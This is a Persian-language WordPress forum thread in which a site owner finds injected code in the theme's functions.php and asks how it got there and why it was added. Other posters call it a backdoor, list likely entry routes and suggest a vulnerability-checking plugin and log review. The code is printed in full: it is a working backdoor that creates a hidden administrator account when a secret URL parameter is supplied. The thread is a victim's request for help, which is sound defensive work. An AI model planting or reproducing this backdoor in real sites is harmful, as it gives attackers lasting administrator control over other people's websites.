رفتن به مطلب

هک شدن وردپرس با اضافه شدن کد به functions.php

majid1889

پست های پیشنهاد شده

سلام رفقا !

من تقریبا یه سال پیش یه سایتی ساختم امروز که بهش سر زدم ، دیدم بالای سایت ی خط ارور داده که مربوط به فایل functions.php می شد

وقتی فایل رو چک کردم دیدم همچین کدی اضافه شده :

add_action( 'wp_head', 'my_back' );
function my_back() {
    if ( $_GET['back'] == 'drjtd4v4' ) {
        require( 'wp-includes/registration.php' );
        if ( !username_exists( 'mr_admin' ) ) {
            $user_id = wp_create_user( 'guest', 'drjtd4v4' );
            $user = new WP_User( $user_id );
            $user->set_role( 'administrator' );
        }
    }
}

کل پوسته رو خودم نوشتم و مطمئنم این کل مال من نیست .

۱. چطور کسی تونسته همچین کدی رو اضافه کنه و چه تضمینی هست دوباره اینکار انجام نشه ؟

اینطور که از کد مشخصه میاد ی یوزر میسازه و ادمینش میکنه و طبیعتا سایت مال اون میشه

ولی ۲. سوال اینجاس کسی که تونسته توی فایل functions.php تغییر ایجاد کنه چه نیازی به یوزر داره ؟؟

لینک به ارسال
در 8 ساعت قبل، majid1889 گفته است :

1. چطور کسی تونسته همچین کدی رو اضافه کنه و چه تضمینی هست دوباره اینکار انجام نشه ؟

۲. سوال اینجاس کسی که تونسته توی فایل functions.php تغییر ایجاد کنه چه نیازی به یوزر داره ؟؟

سلام

1. برای اینکار روش های مختلفی وجود داره (مثلاً پلاگین هایی که اجازه و دسترسی به ویرایشگر رو ایجاد میکنه یا داشتن یوزر و پس ادمین یا داشتن یوزر و پس هاست یا در هاست های اشتراکی هک کردن یکی از سایت های موجود در هاست و ... )

2. هکر ها از این نوع کد های به عنوان بک دور استفاده می کنن تا اگر ادمین از هک شدن سایت با خبر شد و رمز ها و پلاگین ها و دسترسی ها رو چک و درست کرد و دسترسی هکر صلب شد بتونه دوباره به سایت دسترسی داشته باشه

(وقتی این از نوع کد ها رو وارد میکنن تا چند وقت سایت رو تحت نظر می گیرن تا بک آپ و ... همه حاوی کد بشن بعداً سایت رو به هم میریزن)

لینک به ارسال
در 6 ساعت قبل، Fara-MarZ گفته است :

سلام

1. برای اینکار روش های مختلفی وجود داره (مثلاً پلاگین هایی که اجازه و دسترسی به ویرایشگر رو ایجاد میکنه یا داشتن یوزر و پس ادمین یا داشتن یوزر و پس هاست یا در هاست های اشتراکی هک کردن یکی از سایت های موجود در هاست و ... )

2. هکر ها از این نوع کد های به عنوان بک دور استفاده می کنن تا اگر ادمین از هک شدن سایت با خبر شد و رمز ها و پلاگین ها و دسترسی ها رو چک و درست کرد و دسترسی هکر صلب شد بتونه دوباره به سایت دسترسی داشته باشه

(وقتی این از نوع کد ها رو وارد میکنن تا چند وقت سایت رو تحت نظر می گیرن تا بک آپ و ... همه حاوی کد بشن بعداً سایت رو به هم میریزن)

مرسی :)

بنظر شما کدوم یک از این پلاگین ها میتونن همچین دسترسی یی داده باشن ؟

Screen Shot 1395-11-04 at 15.43.11.png

لینک به ارسال
  • 2 هفته بعد...
در در 1/23/2017 at 15:44، majid1889 گفته است :

بنظر شما کدوم یک از این پلاگین ها میتونن همچین دسترسی یی داده باشن ؟

پلاگینها رو دانلود کنید و کد مربوطه رو توی اونها سرچ کنید

لینک به ارسال
در 5 ساعت قبل، yaali گفته است :

پلاگینها رو دانلود کنید و کد مربوطه رو توی اونها سرچ کنید

:mellow::mellow:

قطعا این کد تو هیچکدومشون نیست

لینک به ارسال
در 1 ساعت قبل، majid1889 گفته است :

قطعا این کد تو هیچکدومشون نیست

من فکر کردم منظورتون اینه که افزونه ای نصب شده که این کد همراهش بوده

لینک به ارسال

دوستان توصیه میشه این پلاگین رو نصب کنید اگه اکسپولیتی براشون   تو دیتابیس های همچون db-expolite  ,... ثبت شده باشه  اطلاع میده.

https://wordpress.org/plugins/plugin-vulnerabilities/

لینک به ارسال
  • 2 هفته بعد...

سلام باید عرض کنم خدمتتون که هیچ تضمینی وجود نداره که خود هسته وردپرس هم اسیب پذیر نباشه...

اما برای این که شما فایل اسیب پذیررا پیدا کنین و ببینین هکر چطوری کد را اضافه کرده باید لاگ ها را بررسی کنین

یاعلی.

لینک به ارسال

به گفتگو بپیوندید

هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .

مهمان
ارسال پاسخ به این موضوع ...

×   شما در حال چسباندن محتوایی با قالب بندی هستید.   حذف قالب بندی

تنها استفاده از 75 اموجی مجاز می باشد.

×   لینک شما به صورت اتوماتیک جای گذاری شد.   نمایش به صورت لینک

×   محتوای قبلی شما بازگردانی شد.   پاک کردن محتوای ویرایشگر

×   شما مستقیما نمی توانید تصویر خود را قرار دهید. یا آن را اینجا بارگذاری کنید یا از یک URL قرار دهید.

• اضافه کردن...